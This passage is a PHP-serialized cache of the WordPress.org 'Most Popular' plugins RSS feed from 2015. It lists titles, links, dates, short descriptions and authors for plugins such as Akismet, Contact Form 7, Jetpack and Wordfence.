\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:117:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"WordPress Plugins » View: Most Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/browse/popular/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"WordPress Plugins » View: Most Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 22 Mar 2015 22:15:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://bbpress.org/?v=1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:30:{i:0;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Akismet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/plugins/akismet/#post-15\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:11:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"15@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"Akismet checks your comments against the Akismet Web service to see if they look like spam or not.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Contact Form 7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/contact-form-7/#post-2141\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 02 Aug 2007 12:45:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2141@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Just another contact form plugin. Simple but flexible.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Takayuki Miyoshi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Jetpack by WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wordpress.org/plugins/jetpack/#post-23862\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Jan 2011 02:21:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"23862@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Your WordPress, Streamlined.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Tim Moore\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Wordfence Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wordfence/#post-29832\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 04 Sep 2011 03:13:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29832@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:137:\"Wordfence Security is a free enterprise class security and performance plugin that makes your site up to 50 times faster and more secure.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Wordfence\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WooCommerce - excelling eCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/woocommerce/#post-29860\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Sep 2011 08:13:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29860@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WooCommerce is a powerful, extendable eCommerce plugin that helps you sell anything. Beautifully.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"WooThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Google Analytics by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/plugins/google-analytics-for-wordpress/#post-2316\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Sep 2007 12:15:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2316@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:124:\"Track your WordPress site easily with the latest tracking codes and lots added data for search result pages and error pages.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"WordPress SEO by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wordpress.org/plugins/wordpress-seo/#post-8321\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Jan 2009 20:34:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"8321@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"Improve your WordPress SEO: Write better content and have a fully optimized WordPress site using Yoast's WordPress SEO plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"NextGEN Gallery\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/nextgen-gallery/#post-1169\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 23 Apr 2007 20:08:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"1169@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:121:\"The most popular WordPress gallery plugin and one of the most popular plugins of all time with over 12 million downloads.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Alex Rabe\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Advanced Custom Fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/advanced-custom-fields/#post-25254\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 17 Mar 2011 04:07:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"25254@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"Customise WordPress with powerful, professional and intuitive fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"elliotcondon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"WordPress Importer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/wordpress-importer/#post-18101\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 May 2010 17:42:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"18101@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Import posts, pages, comments, custom fields, categories, tags and more from a WordPress export file.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brian Colinger\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"WP-Optimize\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/wp-optimize/#post-8691\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Jan 2009 04:28:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"8691@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"Simple but effective plugin allows you to extensively clean up your WordPress database and optimize it without doing manual queries.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"ruhanirabin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"iThemes Security (formerly Better WP Security)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/better-wp-security/#post-21738\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Oct 2010 22:06:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"21738@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"The easiest, most effective way to secure WordPress in seconds.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Chris Wiegman\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"All in One SEO Pack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/all-in-one-seo-pack/#post-753\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Mar 2007 20:08:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"753@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:126:\"All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"uberdose\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n 